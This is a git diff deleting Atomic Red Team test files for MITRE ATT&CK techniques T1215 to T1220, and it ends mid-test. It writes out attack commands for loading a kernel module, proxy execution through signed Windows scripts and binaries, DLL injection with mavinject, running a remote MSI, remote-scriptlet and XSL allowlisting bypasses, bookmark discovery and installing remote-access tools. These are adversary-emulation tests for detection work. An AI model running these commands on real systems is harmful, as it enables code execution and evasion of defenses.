-## Atomic Tests
-
-- [Atomic Test #1 - Linux - Load Kernel Module via insmod](#atomic-test-1---linux---load-kernel-module-via-insmod)
-
-
-<br/>
-
-## Atomic Test #1 - Linux - Load Kernel Module via insmod
-This test uses the insmod command to load a kernel module for Linux.
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| temp_folder | Temp folder used to compile the code. | path | /tmp/T1215|
-| module_source_path | Path to download Gsecdump binary file | url | PathToAtomicsFolder/T1215/src|
-| module_path | Folder used to store the module. | path | PathToAtomicsFolder/T1215/bin/T1215.ko|
-| module_name | Name of the kernel module name. | string | T1215|
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-sudo insmod #{module_path}
-```
-
-#### Cleanup Commands:
-```bash
-sudo rmmod #{module_name}
-```
-
-
-
-#### Dependencies:  Run with `bash`!
-##### Description: The kernel module must exist on disk at specified location
-##### Check Prereq Commands:
-```bash
-if [ -f #{module_path} ]; then exit 0; else exit 1; fi; 
-```
-##### Get Prereq Commands:
-```bash
-if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
-cp #{module_source_path}/* #{temp_folder}/
-cd #{temp_folder}; make
-mv #{temp_folder}/#{module_name}.ko #{module_path}
-[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1216.md b/Atomic_Threat_Coverage/Triggers/T1216.md
deleted file mode 100644
index af34216..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1216.md
+++ /dev/null
@@ -1,110 +0,0 @@
-# T1216 - Signed Script Proxy Execution
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1216)
-<blockquote>Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
-
-PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. (Citation: Enigma0x3 PubPrn Bypass) Example command: <code>cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png</code>
-
-There are several other signed scripts that may be used in a similar manner. (Citation: GitHub Ultimate AppLocker Bypass List)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - PubPrn.vbs Signed Script Bypass](#atomic-test-1---pubprnvbs-signed-script-bypass)
-
-- [Atomic Test #2 - SyncAppvPublishingServer Signed Script PowerShell Command Execution](#atomic-test-2---syncappvpublishingserver-signed-script-powershell-command-execution)
-
-- [Atomic Test #3 - manage-bde.wsf Signed Script Command Execution](#atomic-test-3---manage-bdewsf-signed-script-command-execution)
-
-
-<br/>
-
-## Atomic Test #1 - PubPrn.vbs Signed Script Bypass
-Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/src/T1216.sct|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - SyncAppvPublishingServer Signed Script PowerShell Command Execution
-Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command.
-Upon execution, calc.exe will be launched.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| command_to_execute | A PowerShell command to execute. | string | Start-Process calc|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - manage-bde.wsf Signed Script Command Execution
-Executes the signed manage-bde.wsf script with options to execute an arbitrary command.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| command_to_execute | A command to execute. | Path | C:&#92;Windows&#92;System32&#92;calc.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-set comspec=#{command_to_execute}
-cscript manage-bde.wsf
-```
-
-#### Cleanup Commands:
-```cmd
-set comspec=C:\Windows\System32\cmd.exe
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1217.md b/Atomic_Threat_Coverage/Triggers/T1217.md
deleted file mode 100644
index 2226ee1..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1217.md
+++ /dev/null
@@ -1,200 +0,0 @@
-# T1217 - Browser Bookmark Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1217)
-<blockquote>Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
-
-Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials in Files](https://attack.mitre.org/techniques/T1081) associated with logins cached by a browser.
-
-Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - List Mozilla Firefox Bookmark Database Files on Linux](#atomic-test-1---list-mozilla-firefox-bookmark-database-files-on-linux)
-
-- [Atomic Test #2 - List Mozilla Firefox Bookmark Database Files on macOS](#atomic-test-2---list-mozilla-firefox-bookmark-database-files-on-macos)
-
-- [Atomic Test #3 - List Google Chrome Bookmark JSON Files on macOS](#atomic-test-3---list-google-chrome-bookmark-json-files-on-macos)
-
-- [Atomic Test #4 - List Google Chrome Bookmarks on Windows with powershell](#atomic-test-4---list-google-chrome-bookmarks-on-windows-with-powershell)
-
-- [Atomic Test #5 - List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt.](#atomic-test-5---list-google-chrome--edge-chromium-bookmarks-on-windows-with-command-prompt)
-
-- [Atomic Test #6 - List Mozilla Firefox bookmarks on Windows with command prompt.](#atomic-test-6---list-mozilla-firefox-bookmarks-on-windows-with-command-prompt)
-
-
-<br/>
-
-## Atomic Test #1 - List Mozilla Firefox Bookmark Database Files on Linux
-Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file.
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Path where captured results will be placed. | Path | /tmp/T1217-Firefox.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-find / -path "*.mozilla/firefox/*/places.sqlite" 2>/dev/null -exec echo {} >> #{output_file} \;
-cat #{output_file} 2>/dev/null
-```
-
-#### Cleanup Commands:
-```sh
-rm -f #{output_file} 2>/dev/null
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - List Mozilla Firefox Bookmark Database Files on macOS
-Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file.
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Path where captured results will be placed. | Path | /tmp/T1217_Firefox.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> #{output_file} \;
-cat #{output_file} 2>/dev/null
-```
-
-#### Cleanup Commands:
-```sh
-rm -f #{output_file} 2>/dev/null
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - List Google Chrome Bookmark JSON Files on macOS
-Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file.
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Path where captured results will be placed. | Path | /tmp/T1217-Chrome.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> #{output_file} \;
-cat #{output_file} 2>/dev/null
-```
-
-#### Cleanup Commands:
-```sh
-rm -f #{output_file} 2>/dev/null
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - List Google Chrome Bookmarks on Windows with powershell
-Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks.
-Upon execution, paths that contain bookmark files will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt.
-Searches for Google Chromes's and Edge Chromium's Bookmarks file (on Windows distributions) that contains bookmarks.
-Upon execution, paths that contain bookmark files will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-where /R C:\Users\ Bookmarks
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - List Mozilla Firefox bookmarks on Windows with command prompt.
-Searches for Mozilla Firefox bookmarks file (on Windows distributions) that contains bookmarks in a SQLITE database.
-Upon execution, paths that contain bookmark files will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-where /R C:\Users\ places.sqlite
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1218.md b/Atomic_Threat_Coverage/Triggers/T1218.md
deleted file mode 100644
index 3d1d809..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1218.md
+++ /dev/null
@@ -1,360 +0,0 @@
-# T1218 - Signed Binary Proxy Execution
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218)
-<blockquote>Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.
-
-### Msiexec.exe
-Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)
-
-* <code>msiexec.exe /q /i "C:\path\to\file.msi"</code>
-* <code>msiexec.exe /q /i http[:]//site[.]com/file.msi</code>
-* <code>msiexec.exe /y "C:\path\to\file.dll"</code>
-
-### Mavinject.exe
-Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)
-
-* <code>"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;</code>
-* <code>C:\Windows\system32\mavinject.exe &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;</code>
-
-### SyncAppvPublishingServer.exe
-SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)
-
-### Odbcconf.exe
-Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to [Regsvr32](https://attack.mitre.org/techniques/T1117) with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
-
-* <code>odbcconf.exe /S /A &lbrace;REGSVR "C:\Users\Public\file.dll"&rbrace;</code>
-
-Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - mavinject - Inject DLL into running process](#atomic-test-1---mavinject---inject-dll-into-running-process)
-
-- [Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code](#atomic-test-2---syncappvpublishingserver---execute-arbitrary-powershell-code)
-
-- [Atomic Test #3 - Register-CimProvider - Execute evil dll](#atomic-test-3---register-cimprovider---execute-evil-dll)
-
-- [Atomic Test #4 - Msiexec.exe - Execute Local MSI file](#atomic-test-4---msiexecexe---execute-local-msi-file)
-
-- [Atomic Test #5 - Msiexec.exe - Execute Remote MSI file](#atomic-test-5---msiexecexe---execute-remote-msi-file)
-
-- [Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL](#atomic-test-6---msiexecexe---execute-arbitrary-dll)
-
-- [Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL](#atomic-test-7---odbcconfexe---execute-arbitrary-dll)
-
-- [Atomic Test #8 - InfDefaultInstall.exe .inf Execution](#atomic-test-8---infdefaultinstallexe-inf-execution)
-
-
-<br/>
-
-## Atomic Test #1 - mavinject - Inject DLL into running process
-Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| dll_payload | DLL to inject | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;x64&#92;T1218.dll|
-| process_id | PID of process receiving injection | string | 1000|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code
-Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| powershell_code | PowerShell code to execute | string | Start-Process calc.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-SyncAppvPublishingServer.exe "n; #{powershell_code}"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Register-CimProvider - Execute evil dll
-Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| dll_payload | DLL to execute | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;Win32&#92;T1218-2.dll|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Msiexec.exe - Execute Local MSI file
-Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| msi_payload | MSI file to execute | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;Win32&#92;T1218.msi|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-msiexec.exe /q /i "#{msi_payload}"
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: T1218.msi must exist on disk at specified location (#{msi_payload})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{msi_payload}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Write-Host "You must provide your own MSI"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Msiexec.exe - Execute Remote MSI file
-Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-msiexec.exe /q /i "#{msi_payload}"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL
-Execute arbitrary DLL file stored locally. Commonly seen in application installation.
-Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder.
-By default, if the src folder is not in place, it will download the 64 bit version.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| dll_payload | DLL to execute | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;x64&#92;T1218.dll|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-msiexec.exe /y "#{dll_payload}"
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL
-Execute arbitrary DLL file stored locally.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| dll_payload | DLL to execute | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;Win32&#92;T1218-2.dll|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - InfDefaultInstall.exe .inf Execution
-Test execution of a .inf using InfDefaultInstall.exe
-
-Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder&#92;T1218&#92;src&#92;Infdefaultinstall.inf|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-InfDefaultInstall.exe #{inf_to_execute}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: INF file must exist on disk at specified location (#{inf_to_execute})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1219.md b/Atomic_Threat_Coverage/Triggers/T1219.md
deleted file mode 100644
index 1d462b4..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1219.md
+++ /dev/null
@@ -1,92 +0,0 @@
-# T1219 - Remote Access Tools
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1219)
-<blockquote>An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
-Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
-
-Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - TeamViewer Files Detected Test on Windows](#atomic-test-1---teamviewer-files-detected-test-on-windows)
-
-- [Atomic Test #2 - AnyDesk Files Detected Test on Windows](#atomic-test-2---anydesk-files-detected-test-on-windows)
-
-- [Atomic Test #3 - LogMeIn Files Detected Test on Windows](#atomic-test-3---logmein-files-detected-test-on-windows)
-
-
-<br/>
-
-## Atomic Test #1 - TeamViewer Files Detected Test on Windows
-An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe
-C:\Users\$env:username\Desktop\TeamViewer_Setup.exe
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - AnyDesk Files Detected Test on Windows
-An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe
-C:\Users\$env:username\Desktop\AnyDesk.exe
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - LogMeIn Files Detected Test on Windows
-An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi
-C:\Users\$env:username\Desktop\LogMeInIgnition.msi
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1220.md b/Atomic_Threat_Coverage/Triggers/T1220.md
deleted file mode 100644
index 37e6986..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1220.md
+++ /dev/null
@@ -1,186 +0,0 @@
-# T1220 - XSL Script Processing
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1220)
-<blockquote>Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
-
-Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Similar to [Trusted Developer Utilities](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
-
-Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
-
-* <code>msxsl.exe customers[.]xml script[.]xsl</code>
-* <code>msxsl.exe script[.]xsl script[.]xsl</code>
-* <code>msxsl.exe script[.]jpeg script[.]jpeg</code>
-
-Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)
-
-Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
-
-* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
-* Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code></blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - MSXSL Bypass using local files](#atomic-test-1---msxsl-bypass-using-local-files)
-
-- [Atomic Test #2 - MSXSL Bypass using remote files](#atomic-test-2---msxsl-bypass-using-remote-files)
-
-- [Atomic Test #3 - WMIC bypass using local XSL file](#atomic-test-3---wmic-bypass-using-local-xsl-file)
-
-- [Atomic Test #4 - WMIC bypass using remote XSL file](#atomic-test-4---wmic-bypass-using-remote-xsl-file)
-
-
-<br/>
-
-## Atomic Test #1 - MSXSL Bypass using local files
-Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| xmlfile | Location of the test XML file on the local filesystem. | Path | PathToAtomicsFolder&#92;T1220&#92;src&#92;msxslxmlfile.xml|
-| xslfile | Location of the test XSL script file on the local filesystem. | Path | PathToAtomicsFolder&#92;T1220&#92;src&#92;msxslscript.xsl|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: XML file must exist on disk at specified location (#{xmlfile})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{xmlfile}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}"
-```
-##### Description: XSL file must exist on disk at specified location (#{xslfile})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{xslfile}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - MSXSL Bypass using remote files
-Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml|
